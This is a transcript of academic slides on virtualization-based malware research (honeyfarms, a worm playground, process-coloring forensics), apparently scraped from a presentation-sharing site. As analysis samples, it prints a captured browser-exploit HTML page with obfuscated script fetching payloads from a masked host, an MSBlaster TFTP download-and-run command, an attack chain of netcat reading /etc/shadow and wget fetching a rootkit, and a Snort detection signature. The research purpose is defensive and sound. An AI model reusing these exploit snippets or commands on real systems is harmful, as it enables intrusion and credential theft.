1 / 48

Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and C

Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS) Purdue University. Collaborators. Florian Buchholz (James Madison U.)

loren
Download Presentation

Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and C

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Enabling Internet Malware Investigation and Defense Using Virtualization Dongyan Xu Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS) Purdue University

  2. Collaborators • Florian Buchholz (James Madison U.) • Xuxian Jiang (George Mason U.) • Junghwan Rhee (Purdue U.) • Ryan Riley (Purdue U.) • Eugene H. Spafford (Purdue U.) • AAron Walters (Fortify Research) • Helen Wang (Microsoft Research) • Yi-Min Wang (Microsoft Research)

  3. Motivation: Rampant Malware Outbreaks • Internet malware remains a top threat • Malware: Virus, Worm, Spyware, Keylogger, Bot… Blaster CodeRed Nimda Source: Symantec Internet Security Threat Report

  4. Motivation: Stealthy Malware • Recruiting Vulnerable Nodes (e.g. to create Botnet) • Zero-day exploits w/o software patches • Low-and-slow propagation • New attack strategies • Exploiting vulnerable client-side software, such as IE • Propagating malware with RFID tags • Providing “Value-Added” Service (or rather, harm) • DDoS, spamming, identity theft, … • Sell/rent botnets for profit

  5. Reality & Challenges • Lackof investigation platform that enables • Early detection and capture of malware incidents • Replay and observation of malware behavior • At Internet scale this is hard to build • Increased spreading speed, sophistication, and malice Slammer Worms infect 75,000 hosts in 10 minutes (Moore et al, 2003) Stealthy Malware, Zero-day Exploits, Mutations, …

  6. Malware Trap Behavioral Footprinting Contamination Tracking Malware Playground System Randomization Our Integrated Malware Research Framework Detection Investigation Defense Virtualization External Infection WORM’06 Internal Contamination Front-End: Collapsar Honeyfarm Back-End: vGround Playground vGround: RAID’05 Proc. Coloring: ICDCS’06 Collapsar: Security’04, NDSS’06, JPDC’06

  7. Malware Trap Behavioral Footprinting Contamination Tracking Malware Playground System Randomization Part I: Malware Capture WORM’06 Front-End: Collapsar* Back-End: vGround vGround: RAID’05 Collapsar: Security’04, NDSS’06, JPDC’06 Coloring: ICDCS’06

  8. Existing Approach: Honeypot Domain A Domain C Internet Domain B • Two Weaknesses • Manageability vs. Detection Coverage • Security Risks  On-Site Attack Occurrences

  9. Our Approach: Collapsar Domain A Benefit 2: Off-site attack occurrences Redirector Domain C Front-End Redirector Redirector Domain B Collapsar Center VM-based Honeypots Management Station Correlation Engine Benefit 1: Centralized management of honeypots w/ distributed (virtual) presence Benefit 3: New possibilities for real-time attack correlation and log mining Collapsar Honeyfarm

  10. Domain A Redirector Domain C Front-End Redirector Redirector Domain B Collapsar Center VM-based Honeypots Collapsar as a Server-side Honeyfarm • Passive Honeypots w/ Vulnerable Server-side Software • Web Servers (e.g., Apache, IIS, …) • Database Servers (e.g., Oracle, MySQL, …) Blaster (2003) Sasser (2004) Zotob (2005)

  11. Domain A Malicious Web Server Redirector Domain C Front-End Redirector Redirector Domain B Collapsar Center VM-based Honeypots Collapsar as a Client-side Honeyfarm • Active Honeypots w/ Vulnerable Client-side Software • Web Browsers (e.g., IE, Firefox, …) • Email Clients (e.g., Outlook, …) PlanetLab (310 sites) [ HoneyMonkey, NDSS’06] 288 malicious sites / 2 zero-day exploits

  12. A Real Incident: Exploitation of Client-side Vulnerability • Upon Clicking a malicious URL • http://xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html • Result: <html><head><title></title></head><body> <style> * {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")} </style> <APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1> <PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET> <script> try{ document.write('<object data=`&#109&#115&#45&#105&#116&#115&#58 &#109&#104&#116&#109&#108&#58&#102&#105&#108&#101&#58; //C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+ 'm::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>'); }catch(e){}</script> </body></html> MS05-002 MS03-011 MS04-013 22 unwanted programs are installed without user’s consent!

  13. Related Work Passive & Active Passive Active Passive Passive

  14. Malware Trap Behavioral Footprinting Contamination Tracking Malware Playground System Randomization Part II: Malware Playground Front-End: Collapsar Back-End: vGround* vGround: RAID’05 Collapsar: Security’04, NDSS’06, JPDC’06 Coloring: ICDCS’06

  15. Challenges • Fidelity Real worms • Confinement Destructive worms • Scalability Epidemic propagation pattern • Experimental Efficiency

  16. A Virtualization-Based Worm Playground A Worm Playground • High Fidelity • VM: Full-System Virtualization • Strict Confinement • VN: Link-Layer Network Virtualization • Easy Deployment • Locally deployable • Efficient Experiments • Images generation time: 60 seconds • Boot-strap time: 90 seconds • Tear-down time: 10 seconds Virtualization paris.cs.purdue.edu In “Fighting Computer Virus Attacks”, Peter Szor, USENIX Security Symp., 2004

  17. Challenge inAchieving Scalability • Three Main Techniques: • VM Footprint Minimization • Redhat 9.0: 1G  32M • Delta Virtualization (a.k.a., Copy-on-Write) • Worm-driven vGround Runtime Expansion • 2000+ virtual nodes in 10 physical machines

  18. Worm Expert’s Comments on vGround

  19. vGround Impact & Applications • Evaluation • Correctness of documented worm/malware analysis • Effectiveness of defense mechanisms • Education Potentials

  20. Malware Trap Behavioral Footprinting Contamination Tracking Malware Playground System Randomization Part III: Malware Defense Internal Contamination Front-End: Collapsar Back-End: vGround vGround: RAID’05 Collapsar: Security’04, NDSS’06, JPDC’06 Coloring: ICDCS’06

  21. Malware Forensics • For each malware incident, it is desirable to find out: • Break-in Point: • How did the malware break into the system? • Contaminations: • What did the malware do after the break-in?

  22. Current Approach Question 1: How did the malware break into the system? Question 2: What did the malware do after break-in? • /etc/shadow • Confidential Info httpd httpd netcat /bin/sh Local files Alert wget Root kit

  23. Current Approach 1: Online Log Collection Log “/bin/sh” CREATES a new process “netcat” “netcat” READS “/etc/shadow” file “httpd” READS an incoming request • /etc/shadow • Confidential Info httpd httpd netcat “/bin/sh” MODIFIES local files /bin/sh “httpd” CREATES a new process “/bin/sh” Local files Alert “/bin/sh” CREATES a new process “wget” wget Root kit “wget” CREATES local file(s) - “Root kit”

  24. Current Approach 1: Online Log Collection “httpd” CREATES a new process “/bin/sh” 2: Offline Backward Tracking Log “wget” CREATES local file(s) - “Root kit” “/bin/sh” CREATES a new process “wget” Break-in Point ! httpd /bin/sh Alert wget Root kit Backward Tracking [King+, SOSP’03]

  25. Current Approach 1: Online Log Collection 2: Offline Backward Tracking Log “netcat” READS “/etc/shadow” file 3: Offline Forward Tracking “/bin/sh” CREATES a new process “netcat” Break-in Point ! • /etc/shadow • Confidential Info httpd netcat “/bin/sh” MODIFIES local files /bin/sh “httpd” CREATES a new process “/bin/sh” Local files Forward Tracking Alert “/bin/sh” CREATES a new process “wget” wget Root kit “wget” CREATES local file(s) - “Root kit”

  26. Intrusion Occurred Intrusion Detected Long Detection Period Weaknesses of Current Approach Analyze the entire log ! • Backward Tracking  Break-in Point • Inputs: Detection point and the entire Log • Forward Tracking  Contaminations • Inputs: Break-in point and the entire Log High Volume Log Data: 1.2 gigabytes per day under server workload time

  27. Apache Sendmail DNS MySQL Our Approach - Process Coloring • Main Idea: Information Flow-Preserving Logging A suspicious log entry Log

  28. Our Approach - Process Coloring 1: Initial Coloring s30sendmail s30sendmail Log s55sshd s55sshd s45named s45named Benefit 2: Color-based log partition for contamination analysis init rc s80httpd s80httpd • /etc/shadow • Confidential Info httpd netcat Benefit 1: Immediate identification of break-in point /bin/sh Local files 2: Coloring Diffusion Alert wget Root kit

  29. create, mkdir, link create <s1, o1> color(o1) = color(s1) CREATE fork, vfork, clone create <s1, s2> color(s2) = color(s1) color(s1) = color(s1)υcolor(o1) read <s1, o1> read, readv, recv READ read <s1, s2> ptrace color(s1) = color(s1)υcolor(s2) color(o1) = color(s1)υcolor(o1) write <s1, o1> write, writev, send WRITE write <s1, s2> Ptrace, wait, signal color(s2) = color(s1)υcolor(s2) destroy <s1, o1> unlink, rmdir, close DESTROY ---- destroy <s1, s2> exit, kill Color Diffusion Model • Color Diffusion Model • OS-level Information Flow (Buchholz 2005) syscalls Operation Diffusion

  30. Process Coloring Log – Slapper Worm ... BLUE: 673["sendmail"]: 5_open("/proc/loadavg", 0, 438) = 5 BLUE: 673["sendmail"]: 192_mmap2(0, 4096, 3, 34, 4294967295, 0) = 1073868800 BLUE: 673["sendmail"]: 3_read(5, "0.26 0.10 0.03 2...", 4096) = 25 BLUE: 673["sendmail"]: 6_close(5) = 0 BLUE: 673["sendmail"]: 91_munmap(1073868800, 4096) = 0 ... RED: 2568["httpd"]: 102_accept(16, sockaddr{2, cbbdff3a}, cbbdff38) = 5 RED: 2568["httpd"]: 3_read(5, "\1281\1\0\2\0\24...", 11) = 11 RED: 2568["httpd"]: 3_read(5, "\7\0À\5\0\128\3\...", 40) = 40 RED: 2568["httpd"]: 4_write(5, "\132@\4\0\1\0\2\...", 1090) = 1090 … RED: 2568["httpd"]: 4_write(5, "\128\19Ê\136\18\...", 21) = 21 RED: 2568["httpd"]: 63_dup2(5, 2) = 2 RED: 2568["httpd"]: 63_dup2(5, 1) = 1 RED: 2568["httpd"]: 63_dup2(5, 0) = 0 RED: 2568["httpd"]: 11_execve("/bin//sh", bffff4e8, 00000000) RED: 2568["sh"]: 5_open("/etc/ld.so.prelo...", 0, 8) = −2 RED: 2568["sh"]: 5_open("/etc/ld.so.cache", 0, 0) = 6

  31. Evaluation Benefit for Backward Tracking: Immediate identification of break-in point Benefit for Forward Tracking: Reduced log volume for contamination analysis

  32. Challenge in Log Collection • System Call Interception User Process 1 User Process 2 Logging OS Kernel Question : Can we trust a compromised system to collect log information?

  33. ptrace Host OS Kernel + VMM Virtual Machine Introspection [Garfinkel+, NDSS’03] • Interception on system virtualization path More tamper-resistant Virtual Machine User Process 1 User Process 2 Logging Logging OS Kernel Guest OS Kernel/UML

  34. On-going Work • Multi-Dimensional Worm Profiling & Identification • Content Fingerprinting • Unique recurring content • Behavioral Footprinting • Unique recurring behavior  Infection Cycle • Probing  Exploitation  Replication  Payload

  35. MSBlaster/Windows Worm 10. Closes connection • Shell closes 8. Sends “START msblast.exe” command 9. Runs worm on target! ? >tftp –I 192.168.0.1 GET msblast.exe 7. Runs TFTP command; “teleports” msblast.exe file 6. Sends “TFTP” command to shell 5.Creates “TFTP Server” on port 69/UDP 4. Creates a shell “cmd.exe” and binds it to port 4444/TCP 3. Connects to target on port 4444/TCP 2. Binds svchost.exe to port 4444/TCP via injected code • Exploits target on port 135/TCP Blaster Target/RPC alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …) 192.168.0.1 192.168.10.11

  36. MSBlaster RPC-DOM Exploitation alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …) Replication

  37. MSBlaster RPC-DOM Welchia Sasser LSASS LPRng Ramen WU-FTPD NFS-UTILS Lion BIND Slapper APACHE SARS SAMBA

  38. Summary Domain A Redirector Domain C Front-End Redirector Redirector Domain B Collapsar vGround I vGround II Design and evaluation of advanced malware defense mechanisms using our unique integrated malware research platform

  39. Thank you. For more information: Email:dxu@cs.purdue.edu URL:http://www.cs.purdue.edu/~dxu

  40. Backup Slides

  41. Another Example Incident: Windows XP Server-side Honeypot/VMware • Vulnerability • RPC DCOM vulnerability (Microsoft Security Bulletin MS03-026) • Time-line • Deployed: 22:10:00pm, 11/26/03 • MSBlast: 00:36:47am, 11/27/03 • Enbiei: 01:48:57am, 11/27/03 • Nachi: 07:03:55am, 11/27/03 http://www.cs.purdue.edu/homes/jiangx/collapsar

  42. Virtual Machine 1 Virtual Machine 2 vGround: Network Virtualization Option 1: Network-Layer Virtualization (e.g., X-Bone) Guest OS IP-IP Virtual Switch 1 Host OS / VMM Host OS / VMM Option 2: Link-Layer Virtualization (e.g., VIOLIN)

  43. User Space Kernel Space log_restart_syscall log_exit log_fork log_read log_write log_ni_syscall Logging Integrity -- Existing Approach System call interception fork(“/bin/sh”) result restart 0 sys_restart_syscall exit 1 sys_exit System Call Dispatcher fork 2 sys_fork result read 3 sys_read write 4 result sys_write ni_syscall 283 sys_ni_syscall System Call Table Unreliable!

  44. Guest OS 1 Guest OS 2 Guest OS 1 Guest OS 2 Virtual Machine Monitor (VMM) Virtual Machine Monitor (VMM) Host OS Hardware Hardware Type 1 VMM Type 2 VMM Virtual Machine Introspection [Garfinkel+, NDSS’03] • Interception at System Virtualization Path Guest OS 2 Guest OS 2 Logging Logging Tamper-Resistant!

  45. Process Coloring -- Slapper Worm inet_sock(80) recv 2568: httpd accept execve fd 5 dup2, read 2568(execve): /bin//sh execve 2568(execve): /bin/bash -i fork, execve fork, execve 2586: /bin/rm –rf /tmp/.bugtraq.c 2587: /bin/cat open, dup2, write unlink /tmp/.uubugtraq /tmp/.bugtraq.c

  46. inet_sock(80) recv 2568: httpd accept execve fd 5 dup2, read 2568(execve): /bin//sh execve 2568(execve): /bin/bash -i fork, execve fork, execve 2586: /bin/rm –rf /tmp/.bugtraq.c 2587: /bin/cat open, dup2, write unlink /tmp/.uubugtraq /tmp/.bugtraq.c Process Coloring Log – Slapper Worm

  47. Counter-attacks against Proc. Coloring • Coloring mixing attack • Good news: an important anomaly itself • Bad news: need for advanced filtering policies • Low-level attack • Kernel integrity (e.g. CoPilot, Livewire, Pioneer) • Shadow structure via VMM • Diffusion-cutting attack • Covert channels

  48. Footprinting Representation MSBlaster Worm 1st TCP handshake 135/TCP RST alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …) 2nd TCP handshake 4444/TCP (shell) Sending “tftp …” 69/UDP (tftp) RST

More Related